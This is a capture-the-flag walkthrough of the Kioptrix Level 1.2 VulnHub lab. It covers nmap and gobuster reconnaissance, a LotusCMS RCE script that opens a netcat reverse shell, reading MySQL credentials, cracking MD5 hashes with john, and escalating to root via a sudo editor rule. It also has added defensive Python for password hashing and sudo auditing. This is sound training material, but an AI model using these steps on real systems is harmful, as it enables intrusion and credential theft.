KIOPTRIX: LEVEL 1.2 (#3)
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
Host discovery
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:09:20]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.17
Host is up (0.00071s latency).
Nmap scan
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:09:27]
$ sudo nmap --min-rate 10000 -p- 192.168.54.17
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:31:17:5F (VMware)
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:10:17]
$ sudo nmap -sT -sV -O -p22,80 192.168.54.17
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:31:17:5F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:10:43]
$ sudo nmap -sU -p22,80 192.168.54.17
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:31:17:5F (VMware)
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:17:14]
$ sudo nmap --script=vuln -p22,80 192.168.54.17
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
|_ http://192.168.54.17:80/index.php?page=index%27%20OR%20sqlspider
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /cache/: Potentially interesting folder
| /core/: Potentially interesting folder
| /icons/: Potentially interesting folder w/ directory listing
| /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /style/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-trace: TRACE is enabled
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.54.17
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.54.17:80/gallery/
| Form id:
| Form action: login.php
|
| Path: http://192.168.54.17:80/index.php?system=Admin
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.54.17:80/gallery/index.php
| Form id:
| Form action: login.php
|
| Path: http://192.168.54.17:80/gallery/gadmin/
| Form id: username
| Form action: index.php?task=signin
|
| Path: http://192.168.54.17:80/index.php?system=Admin&page=loginSubmit
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.54.17:80/index.php?system=Blog&post=1281005380
| Form id: commentform
|_ Form action:
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:31:17:5F (VMware)
Web penetration
Directory brute-forcing
# yunki @ yunki in ~ [14:11:49]
$ gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.54.17
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.17
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/03/21 14:12:35 Starting gobuster in directory enumeration mode
===============================================================
/modules (Status: 301) [Size: 355] [--> http://192.168.54.17/modules/]
/gallery (Status: 301) [Size: 355] [--> http://192.168.54.17/gallery/]
/data (Status: 403) [Size: 324]
/core (Status: 301) [Size: 352] [--> http://192.168.54.17/core/]
/style (Status: 301) [Size: 353] [--> http://192.168.54.17/style/]
/cache (Status: 301) [Size: 353] [--> http://192.168.54.17/cache/]
/phpmyadmin (Status: 301) [Size: 358] [--> http://192.168.54.17/phpmyadmin/]
/server-status (Status: 403) [Size: 333]
===============================================================
2023/03/21 14:13:33 Finished
===============================================================
The site turns out to run LotusCMS. Searching searchsploit turned up nothing useful, so I searched Google instead and found an RCE shell script on GitHub, which I downloaded to inspect:
https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh
It includes usage instructions.
Getting an initial shell
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:40:05]
$ ./lotusRCE.sh 192.168.54.17
Path found, now to check for vuln....
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
About to try and inject reverse shell....
what IP to use?
192.168.54.128
What PORT?
443
OK, open your local listener and choose the method for back connect:
1) NetCat -e
2) NetCat /dev/tcp
3) NetCat Backpipe
4) NetCat FIFO
5) Exit
#? 1
Listener side
# yunki @ yunki in ~ [14:37:30]
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.17] 59270
whoami
www-data
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
python -c "import pty;pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$ clear
clear
TERM environment variable not set.
www-data@Kioptrix3:/home/www/kioptrix3.com$ export TERM=xterm-color
export TERM=xterm-color
www-data@Kioptrix3:/home/www/kioptrix3.com$ ls
ls
cache data gallery index.php style
core favicon.ico gnu-lgpl.txt modules update.php
www-data@Kioptrix3:/home/www/kioptrix3.com$ cd gallery
cd gallery
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ ls
ls
BACK gfooter.php logout.php readme.html tags.php
db.sql gfunctions.php p.php recent.php themes
g.php gheader.php photos register.php version.txt
gadmin index.php photos.php scopbin vote.php
gallery.php install.BAK post_comment.php search.php
gconfig.php login.php profile.php slideshow.php
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}
}
}
?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$
Getting a higher-privileged shell
The config file reveals the MySQL credentials. I tried them over SSH first, which failed, so I logged into MySQL to inspect the backend data.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use gallery;
use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.00 sec)
mysql> select * from dev_accounts;
select * from dev_accounts;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.01 sec)
mysql> select * from gallarific_users;
select * from gallarific_users;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| 1 | admin | n0t7t1k4 | superuser | Super | User | | 1302628616 | | 1 | | |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.00 sec)
Log in to the admin backend.
Nothing useful was found there.
Crack the password hashes with john:
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:54:58]
$ john --format=Raw-MD5 info.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:55:21]
$ john --format=Raw-MD5 info.txt --show
?:Mast3r
?:starwars
2 password hashes cracked, 0 left
Log in over SSH. In the end loneferret:starwars logged in successfully!
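As an added example (not from the original walkthrough), the Python below shows why john finishes instantly against dev_accounts: the table stores unsalted MD5, so one digest per wordlist entry matches every account at once, and it places the salted, iterated storage the application should have used beside it. The two hashes are the ones from the table above; the wordlist is a constructed stand-in for rockyou.txt and the iteration count is an assumed value.

```python
import hashlib
import hmac
import os

# Unsalted MD5 digests exactly as stored in the VM's dev_accounts table (from the page).
DEV_ACCOUNTS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "Mast3r", "letmein", "starwars", "kioptrix"]

ITERATIONS = 600_000  # PBKDF2 work factor for the hardened scheme (assumed value)


def raw_md5(password):
    return hashlib.md5(password.encode()).hexdigest()


def dictionary_check(hashes, wordlist):
    """Return {username: password} for every stored hash found in the wordlist.

    Because the scheme is unsalted, each wordlist entry is hashed once and the
    digest is compared against all accounts at the same time, which is why
    john reports the whole table cracked almost immediately.
    """
    lookup = {raw_md5(w): w for w in wordlist}
    return {user: lookup[h] for user, h in hashes.items() if h in lookup}


def hash_password(password, salt=None):
    """Hardened storage: random per-user salt plus PBKDF2-HMAC-SHA256 iterations.

    Identical passwords now produce different records, and every guess must be
    re-derived per account, so a shared precomputed table no longer works.
    """
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Constant-time check of a candidate password against a hash_password record."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(dictionary_check(DEV_ACCOUNTS, WORDLIST))
    record = hash_password("starwars")
    print(record, verify_password("starwars", record))
```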
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:58:47]
$ sudo ssh dreg@192.168.54.17
[sudo] yunki 的密码:
The authenticity of host '192.168.54.17 (192.168.54.17)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.17' (RSA) to the list of known hosts.
dreg@192.168.54.17's password:
Permission denied, please try again.
dreg@192.168.54.17's password:
# yunki @ yunki in ~/vulnhub/KioptrixVM3 [14:59:15] C:130
$ sudo ssh loneferret@192.168.54.17
loneferret@192.168.54.17's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ whoami
loneferret
Privilege escalation to root
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
# run this program via sudo
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
(root) NOPASSWD: /bin/bash
loneferret@Kioptrix3:~$ sudo /bin/bash
root@Kioptrix3:~# whoami
root
root@Kioptrix3:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:31:17:5f brd ff:ff:ff:ff:ff:ff
inet 192.168.54.17/24 brd 192.168.54.255 scope global eth1
inet6 fe80::20c:29ff:fe31:175f/64 scope link
valid_lft forever preferred_lft forever
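An added check, not part of the original session, that a defender can run over `sudo -l` output like the one above: it parses each rule and flags shells and editors runnable as root, since the `!/usr/bin/su` exclusion cannot hold once a root-level editor or shell is permitted. The sample text is constructed from the page's output, and the editor and shell name sets beyond `ht` and `bash` are assumptions.

```python
import re

# Constructed sample mirroring the `sudo -l` output in the session above.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Programs that hand the caller a shell or can rewrite arbitrary files as the
# run-as user. 'ht' is the editor granted on this box; the others are assumed.
SHELLS = {"bash", "sh", "dash", "zsh", "su"}
EDITORS = {"ht", "vi", "vim", "nano", "emacs"}

# One rule line: "(runas) TAG: TAG: [!]/path/to/command ..."
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<neg>!?)(?P<cmd>\S+)"
)


def parse_sudo_l(text):
    """Turn `sudo -l` output into a list of rule dicts; non-rule lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append({"runas": m.group("runas"), "nopasswd": "NOPASSWD" in tags,
                      "negated": m.group("neg") == "!", "cmd": m.group("cmd")})
    return rules


def audit(rules):
    """Flag rules that make the run-as account's full privileges reachable."""
    findings = []
    for r in rules:
        if r["negated"]:
            continue  # a '!' rule only excludes; it grants nothing by itself
        name = r["cmd"].rsplit("/", 1)[-1]
        auth = "without a password" if r["nopasswd"] else "with a password"
        if name in SHELLS:
            findings.append(f"{r['cmd']}: shell as {r['runas']} {auth}")
        elif name in EDITORS:
            findings.append(f"{r['cmd']}: editor as {r['runas']} {auth}; "
                            "any file owned by that user, sudoers included, is writable")
    excluded = [r["cmd"] for r in rules if r["negated"]]
    if excluded and findings:  # an exclusion next to a granted shell/editor is moot
        findings.append(f"exclusion of {', '.join(excluded)} is ineffective given the above")
    return findings
```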